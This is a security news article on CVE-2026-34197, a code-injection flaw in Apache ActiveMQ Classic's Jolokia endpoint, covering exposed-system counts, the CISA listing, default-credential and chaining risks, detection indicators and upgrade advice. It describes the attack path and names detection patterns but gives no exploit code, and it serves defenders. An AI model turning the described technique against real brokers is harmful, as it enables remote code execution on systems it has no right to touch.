6,000+ Apache ActiveMQ instances vulnerable to CVE-2026-34197 remain exposed online
5 min. read 
Published on
More than 6,000 internet-exposed Apache ActiveMQ systems still appear vulnerable to CVE-2026-34197, a newly exploited flaw that CISA has now added to its Known Exploited Vulnerabilities catalog. Shadowserver said it saw 6,364 vulnerable IPs on April 19, 2026 based on version checks, and the organization has started daily internet scans for the issue.
The risk is serious because this is not just another newly disclosed bug. Apache says CVE-2026-34197 is an improper input validation and code injection vulnerability in ActiveMQ Classic, while CISA’s KEV listing means the U.S. agency has evidence of active exploitation in the wild.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Apache ActiveMQ is widely used as a message broker in enterprise software and internal application environments. That gives exposed management interfaces extra value to attackers, who can use a messaging server foothold to disrupt services, pivot deeper into connected systems, or run code on the broker itself.
What CVE-2026-34197 does
Apache’s advisory says the flaw affects the Jolokia JMX-HTTP bridge exposed at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, including broker functions that can be abused to load a remote Spring XML application context.
Apache says an authenticated attacker can trigger the vulnerable path with a crafted discovery URI. Because Spring instantiates singleton beans before the broker validates the configuration, arbitrary code execution can occur on the broker’s JVM through methods such as Runtime.exec().
The vulnerability affects Apache ActiveMQ Broker before 5.19.4 and versions 6.0.0 before 6.2.3. Apache’s advisory recommends upgrading to version 5.19.4 or 6.2.3.
Why the exposure is more urgent now
CISA’s KEV entry adds a federal remediation deadline of April 30, 2026. NVD shows CISA added the flaw to the KEV catalog on April 16 and listed the required action as applying vendor mitigations, following BOD 22-01 guidance for cloud services, or discontinuing use if mitigations are unavailable.
That makes the Shadowserver count more important. A few exposed systems would already matter for a bug under active exploitation, but more than 6,300 exposed IPs suggest a broad attack surface that defenders can measure in real time. Shadowserver said it is now scanning daily and sharing affected IP data through its Accessible ActiveMQ reporting service.
There is another complication. Horizon3.ai said the flaw normally requires credentials, but default credentials such as admin:admin remain common. On ActiveMQ Classic versions 6.0.0 through 6.1.1, Horizon3.ai also says CVE-2026-34197 can become effectively unauthenticated when chained with CVE-2024-32114, which exposes the Jolokia API without authentication.
At a glance
| Item | Detail |
|---|---|
| CVE | CVE-2026-34197 |
| Product | Apache ActiveMQ Classic |
| Vulnerability type | Improper input validation and code injection |
| Impact | Arbitrary code execution on the broker JVM |
| Affected versions | Before 5.19.4, and 6.0.0 before 6.2.3 |
| Fixed versions | 5.19.4 and 6.2.3 |
| KEV due date | April 30, 2026 |
| Exposed systems seen by Shadowserver | 6,364 IPs on April 19, 2026 |
What defenders should do now
Organizations running Apache ActiveMQ should first identify any internet-facing web consoles and Jolokia endpoints. Apache’s own guidance is clear that affected systems should move to fixed releases, and CISA’s KEV action language makes patching and mitigation urgent.
Security teams should also reduce exposure, not just upgrade. If the management console does not need to be public, it should sit behind access controls or a VPN, and defenders should review authentication settings closely because weak or default credentials can sharply lower the bar for exploitation. That recommendation follows from Apache’s description of the attack path and Horizon3.ai’s warning about default credentials.
Monitoring matters here too. Help Net Security’s April 21 update says defenders should look for requests to /api/jolokia/ containing addNetworkConnector, outbound HTTP requests from the ActiveMQ process to unexpected hosts, suspicious vm:// URIs with brokerConfig=xbean:http, and unexpected child processes spawned by the Java process.
Recommended actions
- Upgrade Apache ActiveMQ Classic to 5.19.4 or 6.2.3.
- Inventory any externally reachable ActiveMQ web consoles and Jolokia endpoints.
- Restrict management access to trusted networks or VPN-only paths.
- Check for default or weak credentials on exposed systems.
- Review logs and telemetry for suspicious Jolokia API calls and unexpected outbound connections from the broker.
FAQ
Yes. CISA added it to the Known Exploited Vulnerabilities catalog, which indicates evidence of active exploitation.
Not always in practice. Apache describes the core flaw as authenticated, but Horizon3.ai says some versions can become effectively unauthenticated when chained with CVE-2024-32114.
The flaw affects Apache ActiveMQ Classic, not Artemis. Horizon3.ai explicitly says the issue affects Classic only.
It gives defenders a real-world view of how many vulnerable systems remain exposed online. Shadowserver reported 6,364 vulnerable IPs seen on April 19, 2026 and said it is scanning daily.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages